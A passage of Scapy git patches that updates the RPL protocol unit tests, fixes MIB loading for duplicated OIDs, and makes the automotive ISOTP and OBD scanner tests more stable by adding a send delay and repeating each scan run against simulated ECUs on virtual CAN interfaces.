b'\x9b\x00\x00\x00\x00\x00\x00') # DIS with solicited info option -assert(raw(RPL()/DIS()/OptSolInfo()) == \ +assert(raw(ICMPv6RPL()/RPLDIS()/RPLOptSolInfo()) == \ b'\x9b\x00\x00\x00\x00\x00\x07\x13\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00') # DIO with DAG MC option with link ETX metric -assert(raw(RPL()/DIO()/OptDAGMC()/LinkETX()) == \ +assert(raw(ICMPv6RPL()/RPLDIO()/RPLOptDAGMC()/RPLDAGMCLinkETX()) == \ b'\x9b\x01\x00\x00\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01') # Normal DAO message with single target, since transit assert(raw(IPv6(src="fe80::1", dst="fe80::2")/\ - RPL()/DAO()/\ - OptTgt(plen=128,prefix="fd00::1")/\ - OptTIO()) == \ + ICMPv6RPL()/RPLDAO()/\ + RPLOptTgt(plen=128,prefix="fd00::1")/\ + RPLOptTIO()) == \ b'\x60\x00\x00\x00\x00\x22\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x2c\x04\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x00\xff') -assert(raw(RPL()/DAO(D=1, dodagid="fd00::1")/OptDAGMC()) == \ +assert(raw(ICMPv6RPL()/RPLDAO(D=1, dodagid="fd00::1")/RPLOptDAGMC()) == \ b'\x9b\x02\x00\x00\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00') p=IPv6(b'\x60\x00\x00\x00\x00\x32\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x12\x08\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x12\x00\x80\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x6f\xff') @@ -68,3 +101,15 @@ assert(p.payload.code == 2) # Its a DAO p=IPv6(b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\xe8\x3f\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') assert(p.payload.code == 7) # Its a DCO + +p=IPv6(b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa3\x05\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01') +#p.show() +rpl=p.payload +assert(rpl.code == 1) +dio=rpl.payload +assert(dio.RPLInstanceID == 50) +assert(dio.dtsn == 240) +dagmc=dio.payload +assert(dagmc.len == 6) +mc=dagmc.options[0] +assert(mc.ETX == 1) From ee4a373a7c201ebe34706e929dcb24df25fc069b Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Sun, 7 Jun 2020 10:16:25 +0800 Subject: [PATCH 0196/1632] trying to fix UT --- test/contrib/rpl.uts | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/test/contrib/rpl.uts b/test/contrib/rpl.uts index d77cefc4a92..a8382e463c2 100644 --- a/test/contrib/rpl.uts +++ b/test/contrib/rpl.uts @@ -96,12 +96,13 @@ assert(raw(IPv6(src="fe80::1", dst="fe80::2")/\ assert(raw(ICMPv6RPL()/RPLDAO(D=1, dodagid="fd00::1")/RPLOptDAGMC()) == \ b'\x9b\x02\x00\x00\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00') -p=IPv6(b'\x60\x00\x00\x00\x00\x32\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x12\x08\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x12\x00\x80\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x6f\xff') -assert(p.payload.code == 2) # Its a DAO - p=IPv6(b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\xe8\x3f\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') assert(p.payload.code == 7) # Its a DCO +p=IPv6(b'\x60\x00\x00\x00\x00\x32\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x12\x08\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x12\x00\x80\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x6f\xff') +p.show() +assert(p.payload.code == 2) # Its a DAO + p=IPv6(b'\x60\x00\x00\x00\x00\x24\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x01\xa3\x05\x32\x00\x00\x01\x88\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x06\x07\x00\x00\x02\x00\x01') #p.show() rpl=p.payload From 487927f8dd359a3fe23465613fc27c64fadaef33 Mon Sep 17 00:00:00 2001 From: Rahul Jadhav Date: Sun, 7 Jun 2020 11:07:21 +0800 Subject: [PATCH 0197/1632] fix for UT for DAO --- test/contrib/rpl.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/contrib/rpl.uts b/test/contrib/rpl.uts index a8382e463c2..757a0df306f 100644 --- a/test/contrib/rpl.uts +++ b/test/contrib/rpl.uts @@ -99,7 +99,7 @@ assert(raw(ICMPv6RPL()/RPLDAO(D=1, dodagid="fd00::1")/RPLOptDAGMC()) == \ p=IPv6(b'\x60\x00\x00\x00\x00\x1c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x0f\x86\xcc\x88\xaf\xfa\xbe\x25\xff\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1a\x9b\x07\xe8\x3f\x32\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') assert(p.payload.code == 7) # Its a DCO -p=IPv6(b'\x60\x00\x00\x00\x00\x32\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x12\x08\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x12\x00\x80\xaa\xaa\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x06\x04\x00\x00\x6f\xff') +p=IPv6(b'\x60\x00\x00\x00\x00\x2c\x3a\x40\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xfe\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x9b\x02\x35\xbb\x32\x40\x00\x01\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x12\x00\x80\xfd\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01') p.show() assert(p.payload.code == 2) # Its a DAO From 50efb411c0b955809989e93b16a896a5f8f6480b Mon Sep 17 00:00:00 2001 From: gpotter Date: Sun, 7 Jun 2020 14:55:18 +0200 Subject: [PATCH 0198/1632] Fix load_mib on duplicated OIDs --- scapy/asn1/mib.py | 45 ++++++++++++++++++++++++++++++++++++--------- test/regression.uts | 9 ++++----- 2 files changed, 40 insertions(+), 14 deletions(-) diff --git a/scapy/asn1/mib.py b/scapy/asn1/mib.py index f9df6a3a32e..b2fa4d0cf3c 100644 --- a/scapy/asn1/mib.py +++ b/scapy/asn1/mib.py @@ -88,12 +88,21 @@ def _make_graph(self, other_keys=None, **kargs): do_graph(s, **kargs) -def _mib_register(ident, value, the_mib, unresolved): - """Internal function used to register an OID and its name in a MIBDict""" - if ident in the_mib or ident in unresolved: - return ident in the_mib +def _mib_register(ident, value, the_mib, unresolved, alias): + """ + Internal function used to register an OID and its name in a MIBDict + """ + if ident in the_mib: + # We have already resolved this one. Store the alias + alias[".".join(value)] = ident + return True + if ident in unresolved: + # We know we can't resolve this one + return False resval = [] not_resolved = 0 + # Resolve the OID + # (e.g. 2.basicConstraints.3 -> 2.2.5.29.19.3) for v in value: if _mib_re_integer.match(v): resval.append(v) @@ -110,15 +119,20 @@ def _mib_register(ident, value, the_mib, unresolved): else: resval.append(v) if not_resolved: + # Unresolved unresolved[ident] = resval return False else: + # Fully resolved the_mib[ident] = resval keys = list(unresolved) i = 0 + # Go through the unresolved to update the ones that + # depended on the one we just did while i < len(keys): k = keys[i] - if _mib_register(k, unresolved[k], the_mib, {}): + if _mib_register(k, unresolved[k], the_mib, {}, alias): + # Now resolved: we can remove it from unresolved del(unresolved[k]) del(keys[i]) i = 0 @@ -129,19 +143,26 @@ def _mib_register(ident, value, the_mib, unresolved): def load_mib(filenames): - """Load the conf.mib dict from a list of filenames""" + """ + Load the conf.mib dict from a list of filenames + """ the_mib = {'iso': ['1']} unresolved = {} + alias = {} + # Export the current MIB to a working dictionary for k in six.iterkeys(conf.mib): - _mib_register(conf.mib[k], k.split("."), the_mib, unresolved) + _mib_register(conf.mib[k], k.split("."), the_mib, unresolved, alias) + # Read the files if isinstance(filenames, (str, bytes)): filenames = [filenames] for fnames in filenames: for fname in glob(fnames): with open(fname) as f: text = f.read() - cleantext = " ".join(_mib_re_strings.split(" ".join(_mib_re_comments.split(text)))) # noqa: E501 + cleantext = " ".join( + _mib_re_strings.split(" ".join(_mib_re_comments.split(text))) + ) for m in _mib_re_oiddecl.finditer(cleantext): gr = m.groups() ident, oid = gr[0], gr[-1] @@ -151,13 +172,19 @@ def load_mib(filenames): m = _mib_re_both.match(elt) if m: oid[i] = m.groups()[1] - _mib_register(ident, oid, the_mib, unresolved) + _mib_register(ident, oid, the_mib, unresolved, alias) + # Create the new MIB newmib = MIBDict(_name="MIB") + # Add resolved values for oid, key in six.iteritems(the_mib): newmib[".".join(key)] = oid + # Add unresolved values for oid, key in six.iteritems(unresolved): newmib[".".join(key)] = oid + # Add aliases + for key, oid in six.iteritems(alias): + newmib[key] = oid conf.mib = newmib diff --git a/test/regression.uts b/test/regression.uts index b25236b474c..4b8db615f53 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -12212,9 +12212,6 @@ assert a.src == '00:00:00:00:00:00' = MIB ~ mib -import copy -old_mib = copy.copy(conf.mib) - import tempfile fd, fname = tempfile.mkstemp() os.write(fd, b"-- MIB test\nscapy OBJECT IDENTIFIER ::= {test 2807}\n") @@ -12246,9 +12243,11 @@ def get_mib_graph(do_graph): get_mib_graph() -= Restore conf.mib += MIB - test aliases ~ mib -conf.mib = old_mib + +# https://github.com/secdev/scapy/issues/2542 +assert conf.mib._oidname("2.5.29.19") == "basicConstraints" = DADict tests From 4a63ae295def774722c48f490cd46defde00c111 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 8 Jun 2020 09:14:13 +0200 Subject: [PATCH 0199/1632] Try to make automotive unit tests more stable [ready for merge] (#2658) * Try to make OBDScanner unit tests more stable * cleanup isotpscanner tests * increase response time of ECU_am to test if this stabilizes the unit tests * Add send_delay to ECU_am to lower utilization on CI-Machines --- scapy/contrib/automotive/ecu.py | 5 ++ test/contrib/automotive/ecu_am.uts | 2 + test/contrib/automotive/obd/scanner.uts | 3 + test/tools/isotpscanner.uts | 100 +++++++++++++++--------- test/tools/obdscanner.uts | 82 ++++++++----------- 5 files changed, 106 insertions(+), 86 deletions(-) diff --git a/scapy/contrib/automotive/ecu.py b/scapy/contrib/automotive/ecu.py index 03f3ee6fba5..2f549d2767c 100644 --- a/scapy/contrib/automotive/ecu.py +++ b/scapy/contrib/automotive/ecu.py @@ -18,6 +18,7 @@ from scapy.error import Scapy_Exception from scapy.sessions import DefaultSession from scapy.ansmachine import AnsweringMachine +from scapy.config import conf __all__ = ["ECU_State", "ECU", "ECUResponse", "ECUSession", "ECU_am"] @@ -327,6 +328,9 @@ def __ne__(self, other): __hash__ = None +conf.contribs['ECU_am'] = {'send_delay': 0} + + class ECU_am(AnsweringMachine): """AnsweringMachine which emulates the basic behaviour of a real world ECU. Provide a list of ``ECUResponse`` objects to configure the behaviour of this @@ -403,6 +407,7 @@ def make_reply(self, req): def send_reply(self, reply): for p in reply: + time.sleep(conf.contribs['ECU_am']['send_delay']) if len(reply) > 1: time.sleep(random.uniform(0.01, 0.5)) self.main_socket.send(p) diff --git a/test/contrib/automotive/ecu_am.uts b/test/contrib/automotive/ecu_am.uts index d4b1747a166..a41f0b96f72 100644 --- a/test/contrib/automotive/ecu_am.uts +++ b/test/contrib/automotive/ecu_am.uts @@ -131,6 +131,8 @@ else: load_contrib("automotive.uds", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) +print("Set delay to lower utilization") +conf.contribs['ECU_am']['send_delay'] = 0.004 + Simulator tests diff --git a/test/contrib/automotive/obd/scanner.uts b/test/contrib/automotive/obd/scanner.uts index 8b89d263293..f9ba1fdb357 100644 --- a/test/contrib/automotive/obd/scanner.uts +++ b/test/contrib/automotive/obd/scanner.uts @@ -134,6 +134,9 @@ from subprocess import call load_contrib("automotive.obd.scanner", globals_dict=globals()) load_contrib("automotive.ecu", globals_dict=globals()) +print("Set delay to lower utilization") +conf.contribs['ECU_am']['send_delay'] = 0.004 + = Create answers responses = [ diff --git a/test/tools/isotpscanner.uts b/test/tools/isotpscanner.uts index 746af908c39..701448540f6 100644 --- a/test/tools/isotpscanner.uts +++ b/test/tools/isotpscanner.uts @@ -100,7 +100,7 @@ if p1.wait() == 0 and p2.wait() == 0 and b"can_isotp" in p2.stdout.read(): + Syntax check = Import isotp -conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': False} +conf.contribs['ISOTP'] = {'use-can-isotp-kernel-module': ISOTP_KERNEL_MODULE_AVAILABLE} load_contrib("isotp", globals_dict=globals()) ISOTPSocket = ISOTPSoftSocket @@ -126,11 +126,11 @@ assert expected_output in plain_str(std_err) = Test show help result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "--help"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) -assert result.wait() == 0 std_out, std_err = result.communicate() -assert not std_err expected_output = plain_str(b'Scan for open ISOTP-Sockets.') -print(std_out) + +assert not std_err +assert result.wait() == 0 assert expected_output in plain_str(std_out) @@ -141,9 +141,9 @@ if six.PY2: if 0 == version.wait(): print(version.communicate()) result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-c", iface0, "-s", "0x600", "-e", "0x600"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) - assert result.wait() == 1 expected_output = plain_str(b'Please provide all required arguments.') std_out, std_err = result.communicate() + assert result.wait() == 1 assert expected_output in plain_str(std_err) @@ -151,12 +151,13 @@ if six.PY2: result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py", "-i", "socketcan", "-c", iface0, "-s", "0x600", "-e", "0x600", "-v"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) returncode = result.wait() -print(returncode) expected_output = plain_str(b'Start scan') std_out, std_err = result.communicate() + print(std_out) print("%s" % std_err) print(expected_output) + assert returncode == 0 assert expected_output in plain_str(std_out) @@ -170,6 +171,7 @@ std_out, std_err = result.communicate() print(std_out) print("%s" % std_err) print(expected_output) + assert returncode == 0 assert expected_output in plain_str(std_out) @@ -184,6 +186,7 @@ std_out, std_err = result.communicate() print(std_out) print("%s" % std_err) print(expected_output) + assert returncode == 0 assert expected_output in plain_str(std_out) @@ -197,6 +200,7 @@ std_out, std_err = result.communicate() print(std_out) print("%s" % std_err) print(expected_output) + assert returncode == 0 assert expected_output in plain_str(std_out) @@ -210,25 +214,30 @@ started = threading.Event() def isotpserver(): with new_can_socket(iface0) as isocan, ISOTPSocket(isocan, sid=0x700, did=0x600) as s: - s.sniff(timeout=100, count=1, started_callback=started.set) + s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) sniffer.start() started.wait(timeout=10) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x600", "-e", "0x600"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) -returncode = result.wait() -std_out, std_err = result.communicate() +returncode1 = result.wait() +std_out1, std_err1 = result.communicate() +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x600", "-e", "0x600"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) +returncode2 = result.wait() +std_out2, std_err2 = result.communicate() send_returncode = subprocess.call(['cansend', iface0, '600#01aa']) +sniffer.join(timeout=10) + assert 0 == send_returncode -assert returncode == 0 +assert returncode1 == 0 +assert returncode2 == 0 -sniffer.join(timeout=10) expected_output = [b'0x600', b'0x700'] -print(std_out) for out in expected_output: - assert plain_str(out) in plain_str(std_out) + assert plain_str(out) in plain_str(std_out1 + std_out2) = Test extended scan @@ -238,26 +247,32 @@ started = threading.Event() def isotpserver(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x700, did=0x601, extended_addr=0xaa, extended_rx_addr=0xbb) as s: - s.sniff(timeout=100, count=1, started_callback=started.set) + s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) sniffer.start() started.wait(timeout=10) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) -returncode = result.wait() +returncode1 = result.wait() +std_out1, std_err1 = result.communicate() +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) +returncode2 = result.wait() +std_out2, std_err2 = result.communicate() send_returncode = subprocess.call(['cansend', iface0, '601#BB01aa']) -assert 0 == send_returncode -assert returncode == 0 +sniffer.join(timeout=10) expected_output = [b'0x601', b'0xbb', b'0x700', b'0xaa'] -std_out, std_err = result.communicate() -sniffer.join(timeout=10) +assert 0 == send_returncode +assert returncode1 == 0 +assert returncode2 == 0 -assert std_err == None +assert std_err1 == None +assert std_err2 == None for out in expected_output: - assert plain_str(out) in plain_str(std_out) + assert plain_str(out) in plain_str(std_out1 + std_out2) = Test extended only scan @@ -266,26 +281,32 @@ started = threading.Event() def isotpserver(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x700, did=0x601, extended_addr=0xaa, extended_rx_addr=0xbb) as s: - s.sniff(timeout=100, count=1, started_callback=started.set) + s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) sniffer.start() started.wait(timeout=10) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) -returncode = result.wait() +returncode1 = result.wait() +std_out1, std_err1 = result.communicate() +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x"], stdout=subprocess.PIPE) +returncode2 = result.wait() +std_out2, std_err2 = result.communicate() send_returncode = subprocess.call(['cansend', iface0, '601#BB01aa']) -assert 0 == send_returncode -assert returncode == 0 +sniffer.join(timeout=10) expected_output = [b'0x601', b'0xbb', b'0x700', b'0xaa'] -std_out, std_err = result.communicate() -sniffer.join(timeout=10) +assert 0 == send_returncode +assert returncode1 == 0 +assert returncode2 == 0 -assert std_err == None +assert std_err1 == None +assert std_err2 == None for out in expected_output: - assert plain_str(out) in plain_str(std_out) + assert plain_str(out) in plain_str(std_out1 + std_out2) = Test scan with piso flag @@ -295,26 +316,33 @@ started = threading.Event() def isotpserver(): with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x700, did=0x601, extended_addr=0xaa, extended_rx_addr=0xbb) as s: - s.sniff(timeout=100, count=1, started_callback=started.set) + s.sniff(timeout=200, count=1, started_callback=started.set) sniffer = threading.Thread(target=isotpserver) sniffer.start() started.wait(timeout=10) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x", "-C"], stdout=subprocess.PIPE) -returncode = result.wait() +returncode1 = result.wait() +std_out1, std_err1 = result.communicate() + +result = subprocess.Popen([sys.executable, "scapy/tools/automotive/isotpscanner.py"] + can_socket_string_list + ["-s", "0x601", "-e", "0x601", "-x", "-C"], stdout=subprocess.PIPE) +returncode2 = result.wait() +std_out2, std_err2 = result.communicate() send_returncode = subprocess.call(['cansend', iface0, '601#BB01aa']) +sniffer.join(timeout=10) + assert 0 == send_returncode -assert returncode == 0 +assert returncode1 == 0 == returncode2 expected_output = [b'sid=0x601', b'did=0x700', b'padding=False', b'extended_addr=0xbb', b'extended_rx_addr=0xaa'] -std_out, std_err = result.communicate() -sniffer.join(timeout=10) -assert std_err == None +assert std_err1 == None +assert std_err2 == None for out in expected_output: - assert plain_str(out) in plain_str(std_out) + assert plain_str(out) in plain_str(std_out1 + std_out2) + Cleanup diff --git a/test/tools/obdscanner.uts b/test/tools/obdscanner.uts index a1a76534792..2a200c54938 100644 --- a/test/tools/obdscanner.uts +++ b/test/tools/obdscanner.uts @@ -11,6 +11,8 @@ import subprocess, sys from subprocess import call from scapy.contrib.automotive.ecu import * +print("Set delay to lower utilization") +conf.contribs['ECU_am']['send_delay'] = 0.004 = Definition of constants, utility functions and mock classes iface0 = "vcan0" iface1 = "vcan1" @@ -189,19 +191,17 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 15, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) - std_out, std_err = result.communicate() - print(std_out) - print(std_err) - expected_output = b"1 requests were sent, 1 answered" - assert bytes_encode(expected_output) in bytes_encode(std_out) - time.sleep(1) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out1, std_err1 = result.communicate() + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out2, std_err2 = result.communicate() except Exception as e: print(e) finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) - + expected_output = b"1 requests were sent, 1 answered" + assert bytes_encode(expected_output) in bytes_encode(std_out1) or bytes_encode(expected_output) in bytes_encode(std_out2) = Test supported PIDs scan @@ -235,26 +235,19 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) - std_out, std_err = result.communicate() - print(std_out) - print(std_err) - assert std_err == b'' - expected_output = ["5 requests were sent, 4 answered", - "2 requests were sent, 1 answered", - "1 requests were sent, 1 answered"] - time.sleep(1) - for out in expected_output: - assert bytes_encode(out) in bytes_encode(std_out) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out1, std_err1 = result.communicate() + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out2, std_err2 = result.communicate() except Exception as e: print(e) - tester.send(b"\x01\xff\xff\xff\xff") - sim.join(timeout=10) - raise e finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) - + expected_output = ["5 requests were sent, 4 answered", "2 requests were sent, 1 answered", "1 requests were sent, 1 answered"] + assert std_err1 == b'' and std_err2 == b'' + for out in expected_output: + assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) = Test only Service 01 PIDs scan @@ -288,23 +281,19 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) - std_out, std_err = result.communicate() - print(std_out) - print(std_err) - assert std_err == b'' - expected_output = ["5 requests were sent, 4 answered"] - time.sleep(1) - for out in expected_output: - assert bytes_encode(out) in bytes_encode(std_out) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out1, std_err1 = result.communicate() + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-1"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out2, std_err2 = result.communicate() except Exception as e: print(e) - tester.send(b"\x01\xff\xff\xff\xff") - sim.join(timeout=10) - raise e finally: tester.send(b"\x01\xff\xff\xff\xff") sim.join(timeout=10) + expected_output = ["5 requests were sent, 4 answered"] + assert std_err1 == b'' and std_err2 == b'' + for out in expected_output: + assert bytes_encode(out) in bytes_encode(std_out1) or bytes_encode(out) in bytes_encode(std_out2) = Test full scan @@ -321,26 +310,19 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, 0x7e8, 0x7e0, basecls=OBD, sim = threading.Thread(target=answering_machine, kwargs={'verbose': False, 'timeout': 100, 'stop_filter': lambda p: bytes(p) == b"\x01\xff\xff\xff\xff"}) sim.start() try: - result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.15", "-f", "-1", "-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) - std_out, std_err = result.communicate() - print(std_out) - print(std_err) - assert std_err == b'' - time.sleep(1) - expected_output = ["256 requests were sent", - "1 requests were sent, 1 answered"] - for out in expected_output: - print(out) - assert bytes_encode(out) in bytes_encode(std_out) + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-f", "-1", "-3"], stdout=subprocess.PIPE, stderr=subprocess.PIPE) + std_out1, std_err1 = result.communicate() + result = subprocess.Popen([sys.executable, "scapy/tools/automotive/obdscanner.py"] + can_socket_string_list + ["-s", "0x7e0", "-d", "0x7e8", "-t", "0.30", "-f", "-1", 